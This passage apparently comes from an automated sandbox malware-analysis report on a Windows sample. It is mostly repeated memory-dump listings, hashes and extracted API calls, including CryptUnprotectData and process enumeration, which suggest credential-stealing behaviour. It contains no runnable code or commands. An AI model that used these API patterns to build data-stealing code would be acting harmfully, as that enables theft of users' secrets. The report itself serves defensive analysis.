                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GvK$P[)$W_.O$Kz$v'|
                                  • API String ID: 0-976976330
                                  • Opcode ID: 32f147625949fc2124556e8bff3cf2b73bee8e4cbe430abb775e944e31d2651e
                                  • Instruction ID: 1159d183a1fa06f21654ad6733fedf8f2d1fa715fd38d402d739871ce83d9496
                                  • Opcode Fuzzy Hash: 32f147625949fc2124556e8bff3cf2b73bee8e4cbe430abb775e944e31d2651e
                                  • Instruction Fuzzy Hash: DEB2E6F360C204AFE3046E2DEC8567AFBE9EF94720F1A463DE6C4C3744E63598158696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 3efbd51905c43a4c55e14c74284ec2a1286aaf7ffe3b89b99314bef04da0b84c
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: 70419212D09BC9C5CB058B7444A02AEBFB22FE6210F6D82DAC4DD5F382C778514AD3A5
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0070C971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0070C97C
                                  • lstrcat.KERNEL32(?,00720B47), ref: 0070CA43
                                  • lstrcat.KERNEL32(?,00720B4B), ref: 0070CA57
                                  • lstrcat.KERNEL32(?,00720B4E), ref: 0070CA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: b1fd0fa0127fe22ae7461c8998df0ce48c93b4da3c93865b2dd62844fbbd201d
                                  • Instruction ID: dab09bab2f53efb293377eb0c03efa7d14a9f4d171b6ca85eccfc32f7ee3e96b
                                  • Opcode Fuzzy Hash: b1fd0fa0127fe22ae7461c8998df0ce48c93b4da3c93865b2dd62844fbbd201d
                                  • Instruction Fuzzy Hash: F74151B594821DEBDB10CFA4DD89BEEF7B8AB44304F1082A9F509A72C0D7745A84DF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007072AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007072B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007072E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00707304
                                  • LocalFree.KERNEL32(?), ref: 0070730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 757467a1030ab5eb46c49bbaf6db35f1703beb0816594001a2fa1023e66fabd8
                                  • Instruction ID: 5f36a2ce58f0cc7a2f646235991f8120319acd404a4d81c67ee861b2e1731f31
                                  • Opcode Fuzzy Hash: 757467a1030ab5eb46c49bbaf6db35f1703beb0816594001a2fa1023e66fabd8
                                  • Instruction Fuzzy Hash: E0015275A99308BBEB14DFE4DC45F9DB778AB44B00F104145FB05AB2C0D670AA409B64
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007197AE
                                  • Process32First.KERNEL32(00720ACE,00000128), ref: 007197C2
                                  • Process32Next.KERNEL32(00720ACE,00000128), ref: 007197D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 007197EC
                                  • CloseHandle.KERNEL32(00720ACE), ref: 0071980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: b03a3d309544f1799842e2a3aa792510aa7d917ee43072a427077e682ccf6b33
                                  • Instruction ID: eaffd781559185621a470e6a4319cb06599b9cd829a00b12fa69bb0c9ff3fc90
                                  • Opcode Fuzzy Hash: b03a3d309544f1799842e2a3aa792510aa7d917ee43072a427077e682ccf6b33
                                  • Instruction Fuzzy Hash: 6E010C75A59209EBDB20DFE8CD54BDDB7F8BB08700F104699E609A7280E7349A80DF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction ID: bd95b78963a0b9a4c3e993d84719e85bf36c618821937702ade1193858182e17
                                  • Opcode Fuzzy Hash: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction Fuzzy Hash: 2163657241EBE41ECB27CB3067B61517F66BA1361031D49CFC8C18F5B3C6A8AA16E356
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 'Fw_$=i$I@{$_rm
                                  • API String ID: 0-1099222569
                                  • Opcode ID: 8523cd340311964be9b59cfbcef04cc5509ae4fb7aa8b7ec384202ddce5256fa
                                  • Instruction ID: 80b1df76cf6b71abedf36c4470a187d42381a1e92a088ff9f5ecc3832df5e8c6
                                  • Opcode Fuzzy Hash: 8523cd340311964be9b59cfbcef04cc5509ae4fb7aa8b7ec384202ddce5256fa
                                  • Instruction Fuzzy Hash: 91B237F3A0C2049FE304AF2DDC8567ABBE9EB94720F16863DEAC4D3744E93558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $[J}$=p1}$P,k$\tm
                                  • API String ID: 0-1962265822
                                  • Opcode ID: bb39262e69ae1372ed836171b61189e1c0d994a53159c6c149501e0198c3a8dc
                                  • Instruction ID: 9fb9cce583121803f22f170c1892e48d4ceb489d33636568e98378287ea91833
                                  • Opcode Fuzzy Hash: bb39262e69ae1372ed836171b61189e1c0d994a53159c6c149501e0198c3a8dc
                                  • Instruction Fuzzy Hash: 96B206F3A082049FE3046E2DEC8567AFBE9EF94720F16493DEAC4C7744E63598058696
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,007051D4,40000001,00000000,00000000,?,007051D4), ref: 00719050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 4cc05e570b884ae77426726ed395a4d01ff227946cced3d14b6e1656976b46fb
                                  • Instruction ID: 5cb01b668047527d51677e7b8ebabcb2f35924de3c17cd699ed121196ddeaa5c
                                  • Opcode Fuzzy Hash: 4cc05e570b884ae77426726ed395a4d01ff227946cced3d14b6e1656976b46fb
                                  • Instruction Fuzzy Hash: F3110D74204205FFDF00CF98D855FAA73A9AF89310F108448FA168B290D775E9829B60
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00720DE8,00000000,?), ref: 00717B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00720DE8,00000000,?), ref: 00717B54
                                  • wsprintfA.USER32 ref: 00717B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 8c0ca81ebe167fee052a97f5482d66cf2520f6ee313fd85cd85b4667a45c0aec
                                  • Instruction ID: 1f12827a265c99cb6b39748dd53e18cfac0e00f0e155c0d80df81012d9aac73a
                                  • Opcode Fuzzy Hash: 8c0ca81ebe167fee052a97f5482d66cf2520f6ee313fd85cd85b4667a45c0aec
                                  • Instruction Fuzzy Hash: 55112AB2959118ABCB14DBC9DD45BBEF7B8EB4CB11F10411AF615A2280E3395980D7B0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011DE2C0,00000000,?,00720DF8,00000000,?,00000000,00000000), ref: 00717BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011DE2C0,00000000,?,00720DF8,00000000,?,00000000,00000000,?), ref: 00717C0D
                                  • wsprintfA.USER32 ref: 00717C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 4f99d0db8c17ed26d2f193eb92ff5f16d5103d6b1e31d98c5de4a6c6c739b301
                                  • Instruction ID: ac88118775b84927356fa28f8b4858c9129bffe7fb8c75b9d24f6f0eee43d26f
                                  • Opcode Fuzzy Hash: 4f99d0db8c17ed26d2f193eb92ff5f16d5103d6b1e31d98c5de4a6c6c739b301
                                  • Instruction Fuzzy Hash: 58118EB194A228EBEB248F58DC45FA9BB78FB44711F104796F619972D0D7781A80CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
